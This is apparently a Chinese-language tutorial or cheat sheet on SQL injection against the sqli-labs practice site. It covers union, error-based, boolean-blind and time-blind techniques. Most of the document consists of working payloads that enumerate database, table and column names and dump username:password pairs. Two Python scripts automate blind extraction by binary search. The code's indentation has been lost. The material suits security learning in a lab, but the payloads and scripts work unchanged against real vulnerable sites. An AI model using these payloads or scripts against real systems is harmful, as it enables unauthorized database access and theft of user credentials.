联合查询
联合查询注入是一种特定类型的SQL注入攻击。通过利用UNION SQL操作符,攻击者可以将多个SELECT语句的结果合并为一个结果集,从而获取更多的数据。
联合查询注入需要查询的信息在前端页面有回显,将提取数据库信息在前端页面显示。
确认列数
?id=1' order by 3 --+
?id=' union select 1,1,1 --+ #union连接时前边条件为假时后边条件才生效
获取库名
?id=' union select 1,database(),1 --+
获取表名
?id=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),1 --+
获取列名
?id=' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1 --+
获取数据
?id=' union select 1,(select group_concat(username,0x3a,password) from users),1 --+
报错注入
SQL注入的报错注入是一种攻击方式,利用数据库在处理错误时返回的信息来推测数据库结构或敏感信息
报错注入需要在前端页面返回数据库错误信息,利用数据库错误信息来推测数据库内部结构和数据。
updatexml(1,1,1) 一共可接收三个参数,报错位置在第二个参数
extractvalue(1,1) 一共可接收两个参数,报错位置在第二个参数
获取库名
?id=' and updatexml(1,concat(0x3a,database(),0x3a),1) --+
?id=' and extractvalue(1,concat(0x3a,database(),0x3a)) --+
获取表名
?id=' and updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x3a),1) --+
?id=' and extractvalue(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x3a)) --+
获取列名
?id=' and updatexml(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_schema='security'),0x3a),1) --+
?id=' and extractvalue(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_schema='security'),0x3a)) --+
注:updatexml,extractvalue最长可获取32个字节
?id=' and updatexml(1,concat(0x3a,substr((select group_concat(column_name) from information_schema.columns where table_schema='security'),1,32),0x3a),1) --+
?id=' and extractvalue(1,concat(0x3a,substr((select group_concat(column_name) from information_schema.columns where table_schema='security'),1,32),0x3a)) --+
布尔盲注
布尔盲注是一种SQL注入技术,构造一个二元(即真/假)条件,并观察应用程序的响应是否变化。基于响应的不同,可以推测出数据库中的信息。
布尔盲注需要根据查询条件的对错给出不同的响应,利用响应的差异来推测数据库内部结构和数据。
获取长度
?id=1' and length(database())>8 --+ #and 前后两个条件需要同时成立结果为真
获取库名
?id=1' and ascii(substr(database(),1,1))>115 --+
获取表名
?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>115 --+
获取列名
?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1))>115 --+
获取数据
?id=1' and ascii(substr((select group_concat(username,0x3a,password) from
users),1,1))>115 --+
python
import requests
url = "http://127.0.0.1//sqli/Less-8/index.php"
def inject_database(url):
# 使用二分法查询
name = ''
for i in range(100):
low = 32
high = 128
# ascii表从32-128为可见字符
mid = (low + high) // 2
while low < high:
payload = "1' and ascii(substr(database(),%d,1))>%d -- " % (i + 1, mid) #查库名
# payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))>%d -- " % (i + 1, mid) # 查表名
# payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))>%d -- " % (i + 1, mid) #查列名
# payload = "1' and ascii(substr((select group_concat(username,0x3a,password) from users),%d,1))>%d -- " % (i + 1, mid) #查数据
params = {"id": payload}
r = requests.get(url, params=params)
if 'You are in...........' in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print(name)
if __name__ == "__main__":
inject_database(url)时间盲注
时间盲注是一种利用数据库响应时间来推测信息的攻击方式。通过在 SQL 查询中引入延时条件,攻击者可以根据响应时间的长短判断某些信息是否正确。
获取长度
?id=1' and if(length(database())>6,sleep(1),0) --+
获取库名
?id=1' and if(ascii(substr(database(),1,1))>50,sleep(1),0) --+
获取表名
?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50,sleep(1),0) --+
获取列名
?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1))>50,sleep(1),0) --+
获取数据
?id=1' and if(ascii(substr((select group_concat(username,0x3a,password) from users),1,1))>50,sleep(1),0) --+
python
import requests
import time
url = "http://127.0.0.1//sqli/Less-9/index.php"
def inject_database(url):
# 使用二分法查询
name = ''
for i in range(100):
low = 32
high = 128
# ascii表从32-128为可见字符
mid = (low + high) // 2
while low < high:
payload = "1' and if(ascii(substr(database(),%d,1))>%d,sleep(1),0) -- " % (i + 1, mid) #查库名
#payload = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))>%d,sleep(1),0) -- " % (i + 1, mid) #查表名
#payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))>%d,sleep(1),0) -- " % (i + 1, mid) #查列名
#payload = "1' and if(ascii(substr((select group_concat(username,0x3a,password) from users),%d,1))>%d,sleep(1),0) -- " % (i + 1, mid) #查数据
params = {"id": payload}
start_time = time.time()
r = requests.get(url, params=params)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
if __name__ == "__main__":
inject_database(url)